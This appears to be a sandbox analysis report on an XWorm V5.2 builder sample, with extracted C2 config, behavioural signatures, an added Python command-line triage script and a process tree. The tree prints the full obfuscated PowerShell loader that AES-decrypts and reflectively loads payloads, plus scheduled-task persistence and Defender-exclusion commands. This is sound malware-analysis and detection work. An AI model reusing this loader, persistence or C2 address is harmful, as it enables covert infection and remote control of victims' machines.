Analysis

max time kernel: 450s
max time network: 446s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 29-08-2024 19:54

Static task: static1
URLScan task: urlscan1

General

Malware Config

Extracted

family: xworm
version: 5.0
C2: 147.185.221.22:21505
oi9hF5zqqhEXFnvK (field left unlabeled in the extracted config)
Install_directory: %AppData%
install_file: Windows Host Proccess.exe (sic; the misspelling is the sample's own filename and recurs in the Run key, Startup .lnk and process name below)
Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.

Detect Xworm Payload (1 IoC)
  resource                                                                       yara_rule
  behavioral1/memory/3472-439-0x0000000007D10000-0x0000000007D22000-memory.dmp   family_xworm
  The XWorm rule fires only in the memory of PID 3472, the second-stage powershell.exe, which is consistent with the loader script handing the decrypted payload straight to [System.Reflection.Assembly]::Load rather than writing it to disk first.

AgentTesla payload (2 IoCs)
  resource                                                                       yara_rule
  C:\Users\Admin\Downloads\XWorm\XWorm V5.2\Guna.UI2.dll                        family_agenttesla
  behavioral1/memory/5732-478-0x000001B378E10000-0x000001B379004000-memory.dmp   family_agenttesla
  Caveat: Guna.UI2.dll is a third-party WinForms user-interface library, bundled here in the extracted XWorm V5.2 folder, and PID 5732 is the XWormLoader instance that loaded it. A family rule matching a UI library is weak evidence of an Agent Tesla payload; the configuration extracted above belongs to XWorm.

Blocklisted process makes network request (3 IoCs)
  flow   pid    process
  65     3472   powershell.exe
  70     3472   powershell.exe
  73     3472   powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 7 IoCs)
Runs PowerShell with a hidden display window.
  pid    process
  6000   powershell.exe
  4288   powershell.exe
  3472   powershell.exe
  5184   powershell.exe
  4120   powershell.exe
  1300   powershell.exe
  5804   powershell.exe
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
  description         ioc                                                                                                       process
  Key value queried   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation   XWormLoader 5.2 x64.exe
  Key value queried   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation   WScript.exe

Drops startup file (2 IoCs)
  description                    ioc                                                                                                    process
  File opened for modification   C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Proccess.lnk   powershell.exe
  File created                   C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Proccess.lnk   powershell.exe

Executes dropped EXE (3 IoCs)
  pid    process
  5716   XWormLoader 5.2 x64.exe
  5732   XWormLoader 5.2 x64.exe
  3200   Windows Host Proccess

Loads dropped DLL (1 IoC)
  pid    process
  5732   XWormLoader 5.2 x64.exe
Obfuscated with Agile.Net obfuscator (2 IoCs)
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
  resource                                                                       yara_rule
  C:\Users\Admin\Downloads\XWorm\XWorm V5.2\XWorm V5.2.exe                      agile_net
  behavioral1/memory/5732-469-0x000001B3790F0000-0x000001B379D28000-memory.dmp   agile_net

Adds Run key to start application (2 TTPs, 1 IoC)
  description       ioc                                                                                                                                                                   process
  Set value (str)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Host Proccess = "C:\\Users\\Admin\\AppData\\Roaming\\Windows Host Proccess"   powershell.exe

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow   ioc
  64     ip-api.com

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 20 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description   ioc                                                          process (events)
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   powershell.exe (7), cmd.exe (3), net.exe (2), net1.exe (2), schtasks.exe (2), timeout.exe (1), WScript.exe (1), XWormLoader 5.2 x64.exe (1), Windows Host Proccess (1)
  This key is read during normal start-up by ordinary Windows binaries as well, so on its own the signature is low-signal; what is informative here is the set of processes it lists, which is the whole cmd.exe / net.exe / powershell.exe / WScript.exe chain plus the two dropped binaries.

Delays execution with timeout.exe (1 IoC)
  pid    process
  5464   timeout.exe

Enumerates system info in registry (2 TTPs, 6 IoCs)
  description         ioc                                                                  process
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion        XWormLoader 5.2 x64.exe
  Key opened          \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                      msedge.exe
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer   msedge.exe
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName    msedge.exe
  Key opened          \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                      XWormLoader 5.2 x64.exe
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer   XWormLoader 5.2 x64.exe
  BIOS manufacturer and version strings are a common virtual-machine check; the browser reads the same keys, so the XWormLoader entries are the ones worth noting.

Modifies registry class (2 IoCs)
  description   ioc                                                                                 process
  Key created   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings   msedge.exe
  Key created   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings   powershell.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Suspicious behavior: EnumeratesProcesses (62 IoCs)
  pid    process                    events
  4612   msedge.exe                 2
  2584   msedge.exe                 2
  4412   identity_helper.exe        2
  5484   msedge.exe                 2
  6000   powershell.exe             3
  4288   powershell.exe             3
  3472   powershell.exe             4
  4120   powershell.exe             3
  1300   powershell.exe             3
  5804   powershell.exe             3
  5184   powershell.exe             3
  5732   XWormLoader 5.2 x64.exe    29
  3200   Windows Host Proccess      3

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (9 IoCs)
  pid    process      events
  2584   msedge.exe   9

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  pid    process          privileges enabled
  5640   7zG.exe          SeRestorePrivilege, 35, SeSecurityPrivilege (x2)
  6000   powershell.exe   SeDebugPrivilege
  4288   powershell.exe   SeDebugPrivilege, then the full set SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36, enabled twice in full and a third time up to SeUndockPrivilege (59 events)
  Numeric entries are privilege LUIDs the sandbox did not name: 33 SeIncreaseWorkingSetPrivilege, 34 SeTimeZonePrivilege, 35 SeCreateSymbolicLinkPrivilege, 36 SeDelegateSessionUserImpersonatePrivilege. PID 4288 is the powershell.exe that runs Register-ScheduledTask with -RunLevel Highest (see the process tree).

Suspicious use of FindShellTrayWindow (50 IoCs)
  pid    process                    events
  2584   msedge.exe                 48
  5640   7zG.exe                    1
  5732   XWormLoader 5.2 x64.exe    1

Suspicious use of SendNotifyMessage (25 IoCs)
  pid    process                    events
  2584   msedge.exe                 24
  5732   XWormLoader 5.2 x64.exe    1

Suspicious use of SetWindowsHookEx (1 IoC)
  pid    process
  3472   powershell.exe
  The hook is installed from the process whose memory carries the XWorm payload (see Detect Xworm Payload above).

Suspicious use of WriteProcessMemory (64 IoCs)
  source pid   source process   target pids (all msedge.exe)   events
  2584         msedge.exe       1476, 4796, 4612, 3184         64
  All 64 writes are the Edge browser process writing into its own crashpad, GPU, network and storage children (see the process tree); no cross-process write from the malware chain is recorded.
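The PowerShell command lines recorded for PIDs 6000 and 3472 (see the process tree below) never contain the strings FromBase64String, Load or ReadAllText: each method name is written backwards and reassembled at run time with ('gnirtS46esaBmorF'[-1..-16] -join ''), so a detection that only greps the raw command line misses the reflective load and the in-memory AES decrypt. The Python below is an added example, not code from the Triage report or from the sample: it resolves that reversal trick first and then runs a small rule set over each command line. The rule names are this example's own, and the sample command lines are abridged copies of the ones in this report's process tree.

```python
"""Command-line triage for the PowerShell chain shown in this report (added example)."""
from __future__ import annotations

import re

# PowerShell evaluates ( 'text'[-1..-N] -join '' ) to the first N characters
# of the reversed literal; the loader uses it to hide method names.
_REVERSED = re.compile(r"\(\s*'([^']*)'\[-1\.\.-(\d+)\]\s*-join\s*''\s*\)")


def deobfuscate(cmd: str) -> str:
    """Replace each reversed-string expression with the literal it evaluates to."""
    def resolve(m: re.Match) -> str:
        literal, count = m.group(1), int(m.group(2))
        return literal[::-1][:count]
    return _REVERSED.sub(resolve, cmd)


# A rule fires when every pattern matches the de-obfuscated command line.
RULES: dict[str, list[str]] = {
    "hidden_window_ep_bypass": [r"-windowstyle\s+hidden", r"-(ep|executionpolicy)\s+bypass"],
    "reflective_assembly_load": [r"\[System\.Reflection\.Assembly\]::Load\("],
    "aes_decrypt_in_memory": [r"System\.Security\.Cryptography\.Aes\b", r"FromBase64String"],
    "payload_carved_from_batch_comment": [r"StartsWith\(':: '\)"],
    "defender_exclusion_added": [r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\b"],
    "logon_task_runlevel_highest": [r"Register-ScheduledTask\b", r"-AtLogon\b", r"-RunLevel\s+Highest"],
}


def triage(cmd: str) -> list[str]:
    """Sorted names of the rules that fire on one command line."""
    findings = ["reversed_string_obfuscation"] if _REVERSED.search(cmd) else []
    resolved = deobfuscate(cmd)
    findings += [name for name, patterns in RULES.items()
                 if all(re.search(p, resolved, re.IGNORECASE) for p in patterns)]
    return sorted(findings)


def triage_all(command_lines: dict[str, str]) -> dict[str, list[str]]:
    return {label: triage(cmd) for label, cmd in command_lines.items()}


# Abridged from the report's process tree (PIDs 6000/3472, 4288, 1300, and an Edge renderer).
SAMPLE_COMMAND_LINES = {
    "stage1_loader": (
        "powershell.exe -noprofile -windowstyle hidden -ep bypass -command "
        "function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); "
        "$aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')"
        "('MjiE6okCV028+oFP5YAwsvZ620NGNqqKOE0nL728bh8='); } "
        "function execute_function($param_var,$param2_var){ "
        "$IPQHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); } "
        "$iKLJS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')"
        "('C:\\Users\\Admin\\AppData\\Local\\Temp\\XWormLoader 5.2 x64.bat'); "
        "foreach ($yBjek in $iKLJS) { if ($yBjek.StartsWith(':: ')) { $apARp=$yBjek.Substring(3); break; }}"
    ),
    "logon_task": (
        "powershell.exe Register-ScheduledTask -TaskName 'RuntimeBroker_startup_716_str' "
        "-Trigger (New-ScheduledTaskTrigger -AtLogon) "
        "-Action (New-ScheduledTaskAction -Execute 'C:\\Users\\Admin\\AppData\\Roaming\\startup_str_716.vbs') "
        "-RunLevel Highest -Force"
    ),
    "defender_exclusion": "powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'",
    "edge_renderer": '"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --type=renderer --lang=en-US',
}

if __name__ == "__main__":
    for label, hits in triage_all(SAMPLE_COMMAND_LINES).items():
        print(f"{label:20s} {', '.join(hits) or '(nothing)'}")
```

Resolving the reversal before matching is the point: the same three rules that fire on the de-obfuscated loader line produce nothing on its raw text, and the Add-MpPreference line is caught by its own rule even though it neither hides its window nor uses the reversal trick.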
Processes

Chain in brief: the user fetches the XWorm V5.2 builder archive from gofile.io in Edge, extracts it with 7-Zip and runs XWormLoader 5.2 x64.exe (PID 5716). That binary runs a batch file of the same name from %TEMP% (PID 5904), which launches a hidden PowerShell (PID 6000) that decrypts the two payloads embedded in the batch file's ':: ' comment line and loads them in memory, registers a logon scheduled task for startup_str_716.vbs (PID 4288) and starts it (PID 5528). The second-stage PowerShell (PID 3472) carries the XWorm client in memory, adds a Run key and a Startup .lnk for "Windows Host Proccess", adds Defender exclusions, and re-launches the original XWormLoader (PID 5732), which loads the Guna.UI2.dll user-interface library. Children are indented under their parent process.

[PID 2584] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/zXUMtF
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory

    [PID 1476] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa579246f8,0x7ffa57924708,0x7ffa57924718

    [PID 4796] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2

    [PID 4612] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses

    [PID 3184] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8

    [PID 3636] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1

    [PID 3976] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1

    [PID 3472] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4220 /prefetch:1
      Note: PID 3472 is reused later in the run by the second-stage powershell.exe after this renderer exited; every signature above that names PID 3472 lists powershell.exe as the process, not this renderer.

    [PID 4588] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1

    [PID 2932] image C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8

    [PID 4412] image C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

    [PID 3476] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2144 /prefetch:1

    [PID 4176] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1

    [PID 5040] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2300 /prefetch:8

    [PID 2572] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:1

    [PID 1048] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1

    [PID 4720] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1

    [PID 5484] image C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,7337201881759385984,12752145784004962552,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
[PID 5064] image C:\Windows\System32\CompPkgSrv.exe
  cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding

[PID 336] image C:\Windows\System32\CompPkgSrv.exe
  cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding

[PID 5236] image C:\Windows\System32\rundll32.exe
  cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

[PID 5640] image C:\Program Files\7-Zip\7zG.exe
  cmd: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap13705:72:7zEvent20609
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
C:\Users\Admin\Downloads\XWorm\XWorm V5.2\XWormLoader 5.2 x64.exe"C:\Users\Admin\Downloads\XWorm\XWorm V5.2\XWormLoader 5.2 x64.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5716 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.bat" "2⤵
- System Location Discovery: System Language Discovery
PID:5904 -
C:\Windows\SysWOW64\net.exenet file3⤵
- System Location Discovery: System Language Discovery
PID:5948 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 file4⤵
- System Location Discovery: System Language Discovery
PID:5968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MjiE6okCV028+oFP5YAwsvZ620NGNqqKOE0nL728bh8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l8sajgX0GfRtbl8fVcMZlw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $efZPU=New-Object System.IO.MemoryStream(,$param_var); $ObiWC=New-Object System.IO.MemoryStream; $BwaQm=New-Object System.IO.Compression.GZipStream($efZPU, [IO.Compression.CompressionMode]::Decompress); $BwaQm.CopyTo($ObiWC); $BwaQm.Dispose(); $efZPU.Dispose(); $ObiWC.Dispose(); $ObiWC.ToArray();}function execute_function($param_var,$param2_var){ $IPQHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BebPN=$IPQHM.EntryPoint; $BebPN.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.bat';$iKLJS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.bat').Split([Environment]::NewLine);foreach ($yBjek in $iKLJS) { if ($yBjek.StartsWith(':: ')) { $apARp=$yBjek.Substring(3); break; }}$payloads_var=[string[]]$apARp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var 
$null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_716_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_716.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4288 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_716.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5528 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_716.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:3948 -
C:\Windows\SysWOW64\net.exenet file6⤵
- System Location Discovery: System Language Discovery
PID:1876 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 file7⤵
- System Location Discovery: System Language Discovery
PID:2996

Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MjiE6okCV028+oFP5YAwsvZ620NGNqqKOE0nL728bh8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l8sajgX0GfRtbl8fVcMZlw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $efZPU=New-Object System.IO.MemoryStream(,$param_var); $ObiWC=New-Object System.IO.MemoryStream; $BwaQm=New-Object System.IO.Compression.GZipStream($efZPU, [IO.Compression.CompressionMode]::Decompress); $BwaQm.CopyTo($ObiWC); $BwaQm.Dispose(); $efZPU.Dispose(); $ObiWC.Dispose(); $ObiWC.ToArray();}function execute_function($param_var,$param2_var){ $IPQHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BebPN=$IPQHM.EntryPoint; $BebPN.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_716.bat';$iKLJS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_716.bat').Split([Environment]::NewLine);foreach ($yBjek in $iKLJS) { if ($yBjek.StartsWith(':: ')) { $apARp=$yBjek.Substring(3); break; }}$payloads_var=[string[]]$apARp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Tree depth: 6
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3472

Image: C:\Users\Admin\Downloads\XWorm\XWorm V5.2\XWormLoader 5.2 x64.exe
Command line: "C:\Users\Admin\Downloads\XWorm\XWorm V5.2\XWormLoader 5.2 x64.exe"
Tree depth: 7
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5732

Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
